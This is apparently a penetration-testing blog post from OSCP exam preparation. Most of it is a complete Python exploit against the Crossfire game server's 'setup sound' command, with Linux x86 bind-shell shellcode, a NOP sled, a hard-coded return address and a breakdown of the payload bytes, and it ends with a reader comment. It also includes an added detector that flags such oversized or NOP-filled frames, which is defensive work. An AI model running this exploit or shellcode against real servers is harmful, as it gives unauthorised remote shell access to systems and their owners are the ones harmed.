OSCP: Linux shellcode
----------------------
#!/usr/bin/python
# exploit for crossfire (Python 2 syntax: print statement, str used as a byte string)
import socket, sys

host = sys.argv[1]   # target host passed on the command line

# 78 bytes of Linux x86 shellcode
shellcode = ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")

# 4379 bytes in total: 100 + 78 + 4190 + 4 + 7
# original crash pattern, EIP overwritten with \x42\x42\x42\x42:
#crash = '\x41' * 4368 + '\x42\x42\x42\x42' + '\x43' * 7
# 0807b8f8 - Indirect Jump (written little-endian as the new return address)
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7
buffer = '\x11(setup sound ' + crash + '\x90\x00#'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 13327))   # crossfire server port
data = s.recv(1024)        # read the server banner first
print data
s.send(buffer)
s.close()
----------------------
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7
\x90 a NOP sled of 100 bytes leading into the shellcode
\x41 a run of As filling the space up to the saved EIP
\xf8\xb8\x07\x08 the new EIP, 0x0807b8f8 written little-endian: an indirect jump through %eax, which points at the buffer where the shellcode is stored
\x43 a run of Cs padding the buffer out to the 4379-byte length of the overflow
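As an added example that is not part of the original post, here is a small detector that applies the numbers from the breakdown above to a client frame. It assumes a two-byte big-endian length header (the '\x11(' bytes in the script decode to 0x1128 = 4392, the length of 'setup sound ' plus the 4379-byte payload plus the trailing '\x90') and flags oversized or NOP-filled 'setup sound' arguments; the sample frames, the NOP_RUN threshold and the function names are constructed for this example.

```python
import struct

SETUP_SOUND = b'setup sound '
OVERFLOW_OFFSET = 4368   # from the write-up: padding bytes before the saved return address
NOP_RUN = 16             # assumption: a run of 0x90 this long is flagged as a NOP sled

def parse_frame(frame: bytes):
    """Split a client frame into (declared_len, body).
    Assumes a two-byte big-endian length header in front of the command text;
    the header bytes 0x11 0x28 in the script above decode to 4392, the length
    of 'setup sound ' + the 4379-byte payload + the trailing 0x90 byte."""
    if len(frame) < 2:
        return None
    (declared,) = struct.unpack('>H', frame[:2])
    return declared, frame[2:2 + declared]

def inspect_setup_sound(frame: bytes) -> list:
    """Return the reasons a frame resembles the 'setup sound' overflow ([] if clean)."""
    parsed = parse_frame(frame)
    if parsed is None:
        return []
    declared, body = parsed
    if not body.startswith(SETUP_SOUND):
        return []
    arg = body[len(SETUP_SOUND):]
    findings = []
    if declared != len(body):   # truncated frame or lying length field
        findings.append('declared length %d does not match %d body bytes' % (declared, len(body)))
    if len(arg) >= OVERFLOW_OFFSET:
        findings.append('argument is %d bytes, at or beyond the %d-byte overflow offset'
                        % (len(arg), OVERFLOW_OFFSET))
    if b'\x90' * NOP_RUN in arg:
        findings.append('NOP sled (run of 0x90 bytes) inside the option value')
    if any(b < 0x20 or b > 0x7e for b in arg):
        findings.append('non-printable bytes in what should be a short option value')
    return findings

def make_frame(body: bytes) -> bytes:
    """Prefix a body with the assumed two-byte big-endian length header."""
    return struct.pack('>H', len(body)) + body

# Constructed samples, not captured traffic: a normal option value and an
# oversized argument made of a NOP sled plus filler bytes only.
BENIGN = make_frame(b'setup sound 1')
SUSPICIOUS = make_frame(SETUP_SOUND + b'\x90' * 100 + b'A' * 4279)

if __name__ == '__main__':
    for name, f in (('benign', BENIGN), ('suspicious', SUSPICIOUS)):
        print(name, inspect_setup_sound(f) or 'clean')
```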

1 Comment:
When I run host = sys.arg[1] it's giving an error; when I make it arr[0], it is going.
By Pentesting made easy, at June 24, 2013 at 7:49 AM